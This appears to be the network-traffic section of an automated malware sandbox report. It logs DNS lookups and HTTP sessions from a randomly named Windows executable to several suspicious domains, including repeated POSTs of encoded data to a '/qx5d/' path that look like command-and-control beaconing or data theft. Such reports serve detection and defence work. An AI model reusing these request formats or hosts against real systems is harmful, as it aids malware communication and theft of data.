                                                            Nov 27, 2024 15:33:29.593611002 CET4987680192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:29.608752966 CET4987680192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:29.730027914 CET8049876103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:29.730067968 CET8049876103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:31.010962963 CET8049876103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:31.011095047 CET8049876103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:31.011154890 CET4987680192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:31.140258074 CET4987680192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:32.157128096 CET4988380192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:32.277478933 CET8049883103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:32.278814077 CET4988380192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:32.288326979 CET4988380192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:32.409329891 CET8049883103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:33.623339891 CET8049883103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:33.623589993 CET8049883103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:33.623702049 CET4988380192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:33.624037027 CET8049883103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:33.624083996 CET4988380192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:33.626426935 CET4988380192.168.2.5103.224.182.242
                                                            Nov 27, 2024 15:33:33.746794939 CET8049883103.224.182.242192.168.2.5
                                                            Nov 27, 2024 15:33:39.033164024 CET4989980192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:39.153170109 CET8049899172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:39.153250933 CET4989980192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:39.168418884 CET4989980192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:39.290215969 CET8049899172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:40.385756016 CET8049899172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:40.387108088 CET8049899172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:40.387156010 CET4989980192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:40.684932947 CET4989980192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:41.703737974 CET4990680192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:41.823606968 CET8049906172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:41.825599909 CET4990680192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:41.839597940 CET4990680192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:41.960031033 CET8049906172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:43.016271114 CET8049906172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:43.016933918 CET8049906172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:43.017107010 CET4990680192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:43.341198921 CET4990680192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:44.360270977 CET4991280192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:44.480758905 CET8049912172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:44.480853081 CET4991280192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:44.494863987 CET4991280192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:44.615371943 CET8049912172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:44.615382910 CET8049912172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:45.722532034 CET8049912172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:45.723905087 CET8049912172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:45.723961115 CET4991280192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:45.997891903 CET4991280192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:47.026550055 CET4992080192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:47.147289038 CET8049920172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:47.147382975 CET4992080192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:47.159660101 CET4992080192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:47.279635906 CET8049920172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:48.415388107 CET8049920172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:48.415673971 CET8049920172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:48.415929079 CET4992080192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:48.416450024 CET8049920172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:48.416766882 CET4992080192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:48.419039011 CET4992080192.168.2.5172.67.158.106
                                                            Nov 27, 2024 15:33:48.538974047 CET8049920172.67.158.106192.168.2.5
                                                            Nov 27, 2024 15:33:54.098079920 CET4993580192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:54.218167067 CET80499353.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:33:54.218266964 CET4993580192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:54.314254999 CET4993580192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:54.440937996 CET80499353.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:33:55.825778961 CET4993580192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:55.952683926 CET80499353.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:33:55.952897072 CET4993580192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:56.955625057 CET4994280192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:57.075947046 CET80499423.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:33:57.076031923 CET4994280192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:57.092953920 CET4994280192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:57.214601994 CET80499423.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:33:58.606990099 CET4994280192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:58.727376938 CET80499423.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:33:58.731476068 CET4994280192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:59.628575087 CET4994980192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:59.748770952 CET80499493.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:33:59.748861074 CET4994980192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:59.793991089 CET4994980192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:33:59.914175987 CET80499493.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:33:59.914186001 CET80499493.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:34:00.949529886 CET80499493.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:34:00.949594021 CET4994980192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:34:01.310239077 CET4994980192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:34:01.430470943 CET80499493.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:34:02.781740904 CET4995780192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:34:02.901833057 CET80499573.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:34:02.901972055 CET4995780192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:34:02.912448883 CET4995780192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:34:03.032701969 CET80499573.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:34:04.046238899 CET80499573.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:34:04.046394110 CET80499573.33.130.190192.168.2.5
                                                            Nov 27, 2024 15:34:04.046442986 CET4995780192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:34:04.049370050 CET4995780192.168.2.53.33.130.190
                                                            Nov 27, 2024 15:34:04.169269085 CET80499573.33.130.190192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 27, 2024 15:32:49.368706942 CET6393653192.168.2.51.1.1.1
                                                            Nov 27, 2024 15:32:50.158828020 CET53639361.1.1.1192.168.2.5
                                                            Nov 27, 2024 15:33:06.720247984 CET5973853192.168.2.51.1.1.1
                                                            Nov 27, 2024 15:33:07.716413021 CET5973853192.168.2.51.1.1.1
                                                            Nov 27, 2024 15:33:07.962908983 CET53597381.1.1.1192.168.2.5
                                                            Nov 27, 2024 15:33:07.963274002 CET53597381.1.1.1192.168.2.5
                                                            Nov 27, 2024 15:33:22.908042908 CET5172053192.168.2.51.1.1.1
                                                            Nov 27, 2024 15:33:23.919560909 CET5172053192.168.2.51.1.1.1
                                                            Nov 27, 2024 15:33:24.080401897 CET53517201.1.1.1192.168.2.5
                                                            Nov 27, 2024 15:33:24.080416918 CET53517201.1.1.1192.168.2.5
                                                            Nov 27, 2024 15:33:38.641918898 CET5728353192.168.2.51.1.1.1
                                                            Nov 27, 2024 15:33:39.030500889 CET53572831.1.1.1192.168.2.5
                                                            Nov 27, 2024 15:33:53.423525095 CET6351053192.168.2.51.1.1.1
                                                            Nov 27, 2024 15:33:54.058247089 CET53635101.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 27, 2024 15:32:49.368706942 CET192.168.2.51.1.1.10xa824Standard query (0)www.cyperla.xyzA (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:06.720247984 CET192.168.2.51.1.1.10x50bcStandard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:07.716413021 CET192.168.2.51.1.1.10x50bcStandard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:22.908042908 CET192.168.2.51.1.1.10xcbb5Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:23.919560909 CET192.168.2.51.1.1.10xcbb5Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:38.641918898 CET192.168.2.51.1.1.10xd8e0Standard query (0)www.bser101pp.buzzA (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:53.423525095 CET192.168.2.51.1.1.10xa49cStandard query (0)www.goldstarfootwear.shopA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 27, 2024 15:32:50.158828020 CET1.1.1.1192.168.2.50xa824No error (0)www.cyperla.xyzcyperla.xyzCNAME (Canonical name)IN (0x0001)false
                                                            Nov 27, 2024 15:32:50.158828020 CET1.1.1.1192.168.2.50xa824No error (0)cyperla.xyz31.186.11.114A (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:07.962908983 CET1.1.1.1192.168.2.50x50bcNo error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                            Nov 27, 2024 15:33:07.962908983 CET1.1.1.1192.168.2.50x50bcNo error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:07.963274002 CET1.1.1.1192.168.2.50x50bcNo error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                            Nov 27, 2024 15:33:07.963274002 CET1.1.1.1192.168.2.50x50bcNo error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:24.080401897 CET1.1.1.1192.168.2.50xcbb5No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:24.080416918 CET1.1.1.1192.168.2.50xcbb5No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:39.030500889 CET1.1.1.1192.168.2.50xd8e0No error (0)www.bser101pp.buzz172.67.158.106A (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:39.030500889 CET1.1.1.1192.168.2.50xd8e0No error (0)www.bser101pp.buzz104.21.58.90A (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:54.058247089 CET1.1.1.1192.168.2.50xa49cNo error (0)www.goldstarfootwear.shopgoldstarfootwear.shopCNAME (Canonical name)IN (0x0001)false
                                                            Nov 27, 2024 15:33:54.058247089 CET1.1.1.1192.168.2.50xa49cNo error (0)goldstarfootwear.shop3.33.130.190A (IP address)IN (0x0001)false
                                                            Nov 27, 2024 15:33:54.058247089 CET1.1.1.1192.168.2.50xa49cNo error (0)goldstarfootwear.shop15.197.148.33A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.cyperla.xyz
                                                            • www.cstrategy.online
                                                            • www.madhf.tech
                                                            • www.bser101pp.buzz
                                                            • www.goldstarfootwear.shop

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54978631.186.11.114801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:32:50.299137115 CET365OUTGET /qygv/?VF=6pChKdZP-&aX8p=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WgsaqMlEMjEoKLMxsODg9Mufes6Fo8jzqPd1fmEliYc3z1g== HTTP/1.1
                                                            Host: www.cyperla.xyz
                                                            Accept: */*
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Nov 27, 2024 15:32:51.672260046 CET1236INHTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 1251
                                                            date: Wed, 27 Nov 2024 14:32:51 GMT
                                                            server: LiteSpeed
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Nov 27, 2024 15:32:51.672617912 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                            Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549823194.76.119.60801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:08.243638992 CET637OUTPOST /qx5d/ HTTP/1.1
                                                            Host: www.cstrategy.online
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.cstrategy.online
                                                            Content-Length: 205
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.cstrategy.online/qx5d/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 59 51 51 62 57 79 70 64 74 6b 43 4a 4f 52 33 57 79 65 66 4b 4c 44 32 4b 45 41 63 76 67 5a 5a 49 65 75 68 70 2f 38 49 3d
                                                            Data Ascii: aX8p=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYQQbWypdtkCJOR3WyefKLD2KEAcvgZZIeuhp/8I=
                                                            Nov 27, 2024 15:33:09.460431099 CET391INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 27 Nov 2024 14:33:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 178
                                                            Connection: close
                                                            Location: https://www.cstrategy.online/qx5d/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549831194.76.119.60801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:11.208590984 CET657OUTPOST /qx5d/ HTTP/1.1
                                                            Host: www.cstrategy.online
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.cstrategy.online
                                                            Content-Length: 225
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.cstrategy.online/qx5d/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 32 32 43 51 51 65 2b 45 34 62 70 49 42 73 74 66 4b 57 6b 63 48 7a 49 68 46 52 35 2f 4a 33 6b 2f 55 58 39 38 44 49 64 52 52 79 73 6f 5a 50 56 61 65 46 54 6e 5a 69 74 6d 37 77 76 4f 42 61 76 2b 4f 53 33 46 54 70 32 30 71 6e 64 6f 50 4d 67 64 58 2f 78 4a 45 50 34 58 70 57 79 4f 6b 70 64 75 2f 41 51 45 77 71 74 64 68 79 48 56 74 52 79 48 61 6e 49 54 6b 34 41 43 53 51 31 62 44 59 35 74 57 57 55 4c 6e 47 38 6f 38 58 69 59 6a 61 79 55 54 55 59 78 70 34 68 45 4e 78 5a 68 72 65 73 67 51 6e 2f 4c 53 63 32 39 48 7a 72 66 36 5a 58 69 51 76 44
                                                            Data Ascii: aX8p=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjayUTUYxp4hENxZhresgQn/LSc29Hzrf6ZXiQvD
                                                            Nov 27, 2024 15:33:12.586431980 CET391INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 27 Nov 2024 14:33:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 178
                                                            Connection: close
                                                            Location: https://www.cstrategy.online/qx5d/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549837194.76.119.60801732C:\Program Files (x86)\vAAKVpQpArbbmISWHRkaFhhaEkwwLggmWAaspuRaPpSwMdjVQyY\GDDZlGeaCapsK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 27, 2024 15:33:13.870307922 CET1674OUTPOST /qx5d/ HTTP/1.1
                                                            Host: www.cstrategy.online
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-us
                                                            Origin: http://www.cstrategy.online
                                                            Content-Length: 1241
                                                            Connection: close
                                                            Cache-Control: no-cache
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Referer: http://www.cstrategy.online/qx5d/
                                                            User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                            Data Raw: 61 58 38 70 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 33 69 43 4d 79 47 2b 43 62 6a 70 4a 42 73 74 57 71 57 6c 63 48 79 4b 68 46 4a 39 2f 4a 72 30 2f 57 76 39 75 56 55 64 58 6c 6d 73 69 5a 50 56 58 2b 46 53 70 35 6a 6c 6d 37 67 72 4f 46 2b 76 2b 4f 53 33 46 51 78 32 39 62 6e 64 6b 76 4d 6a 55 33 2f 44 44 6b 4f 32 58 76 2b 45 4f 6b 63 71 75 75 67 51 46 51 36 74 61 43 61 48 59 74 52 77 41 61 6d 50 54 6b 30 68 43 53 4d 54 62 44 63 58 74 55 47 55 4c 51 7a 77 77 50 76 49 4d 7a 43 32 59 78 6b 36 77 4f 6b 30 44 64 39 32 6c 35 69 58 70 6a 4c 70 4d 6b 73 69 77 43 62 6c 44 38 46 6b 77 6c 79 31 6f 49 32 38 59 31 79 64 68 55 73 39 5a 67 46 5a 35 72 38 61 30 32 6a 71 71 36 37 33 50 6a 67 79 57 4f 61 76 61 45 72 77 33 6d 61 4d 35 44 46 4a 45 64 74 33 6c 62 6d 76 77 71 4b 2b 35 48 4f 54 53 6c 4a 39 4b 48 2f 7a 49 35 39 62 75 56 79 54 6b 64 78 62 68 63 50 48 62 2b 66 34 2b 45 57 54 2b 4a 31 5a 4d 6c 78 55 6a 54 4e 5a 76 52 6e 76 56 [TRUNCATED]
                                                            Data Ascii: aX8p=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH3iCMyG+CbjpJBstWqWlcHyKhFJ9/Jr0/Wv9uVUdXlmsiZPVX+FSp5jlm7grOF+v+OS3FQx29bndkvMjU3/DDkO2Xv+EOkcquugQFQ6taCaHYtRwAamPTk0hCSMTbDcXtUGULQzwwPvIMzC2Yxk6wOk0Dd92l5iXpjLpMksiwCblD8Fkwly1oI28Y1ydhUs9ZgFZ5r8a02jqq673PjgyWOavaErw3maM5DFJEdt3lbmvwqK+5HOTSlJ9KH/zI59buVyTkdxbhcPHb+f4+EWT+J1ZMlxUjTNZvRnvV/nuvdH5iGgtTelP0OAq8muiqft5naxElSRZGlV681jST4M4XyUSJF+iVYRWH8vNilOpB5EUB66BpJpW9BX87heFttSdQfs9hnhb50PbF5LG4FjoTua2O6M/I5Ym/VEbO4uR4mSFwy6pFG/5XbRSxYnQRzkbS4M6t3xH6uJDCi4Y5S1EirahqWfOgTjq2Fy0pZLPIecfm/kgByxSX/kQOXCL6OgEo6+2aQV2BQlAYaKIhM4WMBAze0FubnImE92O1YUfnwtjY8RR222RnJWXXILuwbF/QUFucm+s+OWCYKXT0EeDD0iJADoox4nazugtpMe7wwrSw+t0aLEpDu3iaLAMXavVy/edJBBVP7d2lo93R7FgJaBJCZNgBkLCv/3212DY4hTj9dIQWJEG2EElvHoT8+s9X8EOapqNtrTFDYRk3ao7Ve1qLAy2e+vVCVOB/7h54bbrs9RQvg6xkUufgzu4DX2t1rolqbwJpXOm4Ge0NKxuuni7Tl4vQhlqPKDomKF/jda3UgjgypRxmUwD6DGij9Mpt/yvaDD/pYf892tBDicuxVklSP5uy4taMBRKA9opmtQRsUAKjCtxs5hKSch/Nn3UtXD5WtUaopqjs3Q1hitBwCk2YYiPLg+Tx5+w+srgOhM/ghflDr/ieSIAEN77BIpMveCUoIo [TRUNCATED]
                                                            Nov 27, 2024 15:33:15.241231918 CET391INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 27 Nov 2024 14:33:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 178
                                                            Connection: close
                                                            Location: https://www.cstrategy.online/qx5d/
